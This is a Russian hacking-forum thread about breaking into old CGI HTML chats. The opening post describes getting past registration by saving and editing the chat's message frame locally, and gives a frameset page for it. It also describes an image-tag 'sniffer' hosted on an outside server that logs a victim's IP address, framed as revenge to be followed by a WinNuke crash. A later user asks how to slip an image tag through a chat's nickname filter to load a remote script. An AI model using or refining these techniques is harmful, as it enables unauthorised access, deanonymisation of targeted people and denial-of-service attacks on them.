Чаты Взлом html чата типа chat.orc.ru, способ.

Discussion in 'Веб-уязвимости' started by Neogan, 3 Oct 2009.

  1. Neogan

    Neogan Banned

    Joined:
    26 Sep 2009
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Можно взломать HTML чаты типа того:

    Где вместо стандартной строки ввода используется
    Где настройки пользователя (цвет сообщений, цвет имени, телефон бабушки и прочий маразм админов) находятся в отдельном фрейме. К примеру таким чатом является www.chat.orc.ru
    Где есть такая строчка . Здесь все зависит от версии чата. Откройте форму отправки сообщений в HTML. Если там есть такая строка <input type="hidden" name="color" value="standart">, то такой чат взлому неподдается. Если же value=black, к примеру, то взлом осуществим.
    Чаты поддающиеся взлому: Это CGI-чаты. Из за общедоступности взлома чаты превращаются в большую помойку из порнушных изображений и бегающих строк. Многим это надоедает и они уходят оттуда. Но не стоит отчаиватся обычно 2-3 человека там сидят... Общий принцип взлома чата одинаков. Сначала вам нужно добится того, чтобы вы могли со своей формы, сохраненной на диске, писать в чат. Последующий взлом зависит от типа этого чата.

    В любом чате фрейм, в котором пишутся сообщения, генерится динамически (для каждого входящего) и, возможно, содержит скрытые поля, типа

    <input type=hidden name=cookie value=SP210125>

    Сохраняем содержимое этого фрейма на диске, дальше правим его так, чтобы можно было с ним работать со своего винта. Заменяем ссылки типа /cgi-bin/refresh.pl на полный путь www.chat.nsm.ru/cgi-bin/refresh.pl и вместо скрытых полей пишим ну что-то, типа

    <input type=text name=cookie value=SP210125 >

    Следующий этап, создаем html документ чтобы собрать чат из кусков.

    "Enter.htm"

    <html>

    <frameset rows="80%,20%">

    <frameset cols=70%,30%">

    <frame name="razg" src="http://www.chat.msm.ru/cgi-bin/refresh.cgi?win+razgovor+nocooki#end">

    <frme name="rigt" src="http://www.chat.msm.ru/right.html">

    </frameset>

    <frame name="bot" src="start.htm">

    </frameset>

    <html>

    Ну вот, выглядит это примерно так. Start.htm-это тот фрейм который мы сохранили и изменили. Далее открываем обозревателем start.htm и попадаем в чат минуя стандартную процедуру регистрации.

    Как использовать Sniffer

    Для тех, кто не знает... Sniffer(нюхач) - программа, которая служит для добывания "секретной" информации, данный "програмный продукт" написаный в виде CGI скрипта на языке Perl служит для добывания IP адресов в недрах сети Internet (Intranet). Прнцип работы: вы размещаете данный снифер в виде картинки, после чего, в логах на сервере делаются записи (в зависимости от посещения этой страницы), где первая запись - Дата , Вторая - (Уникальный с целью наименьшей путаницы) и Третья собственно сам IP адрес. Рекомендации по использованию: 1)(WEB) Chat's. 2) Неординарные ситуации, как то: Вы (заранее) размещаете на "левой" странице e.g. http://www.host.ext/~yourname/page.htm ссылку на картинку , которая выглядит примерно так:

    <html>

    <body>

    ...

    <img src="http://www.soul.rinet.ru/cgi-bin/sniffer.pl?id">

    ...

    </body>

    </html>

    где ID - ваш уникальный идентификатор например затем, вас неожиданно обидели, естественно вы хотите отомстить обидчику и в свою очередь просите его зайти на страницу... ничего неподозревающий человек заходит на вашу страницу, его Браузер считывает картинку, и вы можете приспокойно смотреть лог , где запись [...] (vasya) 127.0.0.1 - это собственно и есть IP адрес обидчика, после данной операции вы можете спокойно положить его, ну к примеру Winnuk'ом.ВНИМАНИЕ: В целях снижения загруженности сервера доступно только последних 500 адресов. Disclaimer (отмазка).
     
  2. Colin47

    Colin47 Elder - Старейшина

    Joined:
    18 May 2008
    Messages:
    130
    Likes Received:
    25
    Reputations:
    0
    хехе, лет 5 назад еще бы прокатило, сейчас уже чаты подобной модификации редкость
     
  3. Arams

    Arams New Member

    Joined:
    8 May 2010
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    согласен..хотя не спец по этим делам....
    но всё же .разрабатываются новые версии...в которых, думаю можно найти новые дырки ....
    спасибо за статейку..
     
  4. Sekret

    Sekret New Member

    Joined:
    5 Sep 2010
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Подскажите! Как использовать эту уязвимость

    Теги HTML в чате фильтруются, удалается все что написано после символа "<" вмсесте с ним. Фильтр обойти не смог, ну просто невозможно наверно. Но все же обнаружил небольшую крайне призрачную уязвимость... Тег можно встаить в Ник, и он не фильтруется... Но есть большой косяк, шипко сильные ограничения по нику:
    1. Ограничение размера - 20 символов в никнейме и еще 20 символов в Имени, они после складываются и получается конструкция "НИК" + пробел + "ИМЯ" . Вообщем возможно встаить 40 символов с пробелом по середине.
    2. Не возможно указать конструкции URL типа http://b45.ru/afv (такого URL нету, просто для примера привел) Ругается на недопустимость такого имени, хотя конструкция http://b45.ru/ проходит (Сами понимаете под таким URL не чего не разместишь, ибо у меня нет такого домена в собственном распоряжении)
    3. ГЛАВНОЕ - ПРОБЕЛ по середине.. если разделить URL: одну часть в НИк другу в Имя то посередине получается пробле, и URL не работает)

    Пробывал через тег <img>. Остальные теги по идее в 40 символов не уместиш... Пробывал кодировать URL .. но конструкции типа &#47 или %47%34 не допустимы, хотя просто смволы & # % в каких то, непонятныхз мне случаях, прозволяет вставить...

    Сразу скажу - прочитал уже статей 5 о способах взлома чатов HTML и ваш форум читал...

    Если кто знает, как обойти эти ограничения или фильтры, пожалуста отпишитесь! Буду очень признателен.

    Мои догадки -
    1 вставить каким то образом URL которое не будет запрещенно в поле (но какое я не разобрался)
    2. Использовать какой то тег, который уместится в 40 символов и ему не будет мешать пробел по середине, но какой???? (для того чтобы загрузить по указанному URL нужный мне скрипт)

    Вообщем, я создал отдельную тему, но ее удалили, ... Поэтому пробую написать в уже сосзданной теме...
    Я не прошу этого сделать за меня, я прошу лишь мне помочь вставить туда либо URL либо какой то тег...
     
  5. Sekret

    Sekret New Member

    Joined:
    5 Sep 2010
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    А еще! Может кто знает, где нибуть можно достать бесплатно домен вида

    http://"домен-3-го уровня"."домен 2-го уровня".ru

    если такой домен будет коротким, то он может пригодится!
     
Loading...